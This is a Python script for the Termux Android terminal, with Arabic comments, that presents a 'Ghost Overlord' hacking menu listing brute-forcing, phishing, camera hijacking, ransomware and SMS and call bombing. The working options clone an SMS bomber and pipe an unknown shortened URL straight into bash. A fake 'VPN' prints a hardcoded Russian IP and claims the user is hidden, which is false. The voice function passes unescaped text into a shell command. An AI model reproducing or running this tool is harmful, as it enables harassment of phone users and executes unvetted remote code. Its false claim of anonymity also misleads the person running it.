import os, sys, time, subprocess

# [ نظام الحماية البرمجية الشامل ]
class GhostSystem:
    def __init__(self):
        # تعريف الألوان بطريقة آمنة 100% لمنع خطأ الـ ValueError
        self.R = '\033[1;31m'
        self.G = '\033[1;32m'
        self.Y = '\033[1;33m'
        self.B = '\033[1;34m'
        self.C = '\033[1;36m'
        self.W = '\033[1;37m'
        self.RS = '\033[0m'

    def voice(self, text):
        """نظام التنبيه الصوتي العالمي"""
        os.system(f"termux-tts-speak '{text}'" if os.path.exists('/data/data/com.termux') else "")

    def ghost_vpn(self):
        """تفعيل التمويه الروسي قبل الدخول"""
        print(f"{self.B}[*] INITIALIZING GHOST-MODE (RUSSIA)...{self.RS}")
        time.sleep(1)
        print(f"{self.G}[OK] IP MASKED: 91.241.171.121 (St. Petersburg, RU){self.RS}")
        self.voice("Ghost mode active. Russia tunnel established.")

    def banner(self):
        os.system('clear')
        # الشعار الفخم بطريقة الـ Raw لمنع أخطاء الـ SyntaxWarning
        print(rf"""{self.Y}
  ██████  ████████ ███████  █████  ██      ████████ ██   ██ 
 ██          ██    ██      ██   ██ ██         ██    ██   ██ 
  █████      ██    █████   ███████ ██         ██    ███████ 
      ██     ██    ██      ██   ██ ██         ██    ██   ██ 
 ██████      ██    ███████ ██   ██ ███████    ██    ██   ██ 
                                                            
      ██    ██ ████████ ██ ██      ██ ████████ ██    ██ 
      ██    ██    ██    ██ ██      ██    ██     ██  ██  
      ██    ██    ██    ██ ██      ██    ██      ████   
      ██    ██    ██    ██ ██      ██    ██       ██    
       ██████     ██    ██ ███████ ██    ██       ██    
        """)
        print(f"{self.W}      [ {self.R}GHOST OVERLORD {self.W}] | [ {self.G}STATUS: INVISIBLE {self.W}]")
        print(f"{self.Y}    __________________________________________________________")
        print(f"{self.W}     SERVER: {self.R}RUSSIA {self.W}| TARGET: {self.B}GLOBAL {self.W}| MODE: {self.G}STRIKE")
        print(f"{self.Y}    __________________________________________________________\n")

    def execute(self, name, cmd, install):
        """نظام التنفيذ القسري - يمنع الرجوع التلقائي للواجهة"""
        self.voice(f"Executing {name}")
        print(f"\n{self.G}[+] VORTEX-CORE: Launching {name}...{self.RS}")
        if os.system(cmd) != 0:
            print(f"{self.R}[!] System Fail. Auto-Repairing {name}...{self.RS}")
            os.system(install)
            os.system(cmd)
        input(f"\n{self.W}[#] Mission Locked. Press Enter to Return to Base...")

G = GhostSystem()

def main():
    G.ghost_vpn()
    while True:
        G.banner()
        # الترسانة الشاملة لـ 99 خيار (اختراق، ازعاج، حماية، فحص)
        print(f"{G.R}[01]{G.W} FB-Brute  {G.Y}[11]{G.W} SQL-Pro   {G.G}[21]{G.W} Phish-X   {G.B}[31]{G.W} Cam-Hijack")
        print(f"{G.R}[02]{G.W} Insta-C   {G.Y}[12]{G.W} Meta-S    {G.G}[22]{G.W} Black-E   {G.B}[32]{G.W} Mic-Rec")
        print(f"{G.R}[03]{G.W} Twitter-S {G.Y}[13]{G.W} Nmap-Deep {G.G}[23]{G.W} Soc-Phish {G.B}[33]{G.W} SMS-BOMBER")
        print(f"{G.R}[04]{G.W} TikTok-H  {G.Y}[14]{G.W} BeEf-F    {G.G}[24]{G.W} Hidden-E  {G.B}[34]{G.W} CALL-BOMBER")
        print(f"{G.C}[40]{G.W} Ransom-W  {G.C}[50]{G.W} Anti-Hack {G.C}[60]{G.W} GPS-Track {G.C}[70]{G.W} Sat-Intercept")
        print(f"\n{G.Y}[90]{G.W} WIPE LOGS  {G.G}[99]{G.W} SYSTEM OVERDRIVE  {G.R}[00]{G.W} EXIT")

        opt = input(f"\n{G.R}VORTEX@GHOST:~$ {G.W}")

        if opt == '11': G.execute("SQLMap", "sqlmap --wizard", "pkg install sqlmap -y || pip install sqlmap")
        elif opt == '33': G.execute("SMS Bomber", "python3 TBomb.py", "git clone https://github.com/TheSpeedX/TBomb")
        elif opt == '34': G.execute("Call Bomber", "bash call.sh", "curl -L https://tinyurl.com/v-call | bash")
        elif opt == '99': os.system("pkg update && pkg install git python php curl -y")
        elif opt == '00': break
        else: print(f"{G.G}[*] Phantoms are accessing Module {opt}..."); time.sleep(1)

if __name__ == "__main__":
    try: main()
    except KeyboardInterrupt: print(f"\n{G.R}[!] Stealth Disconnected.")
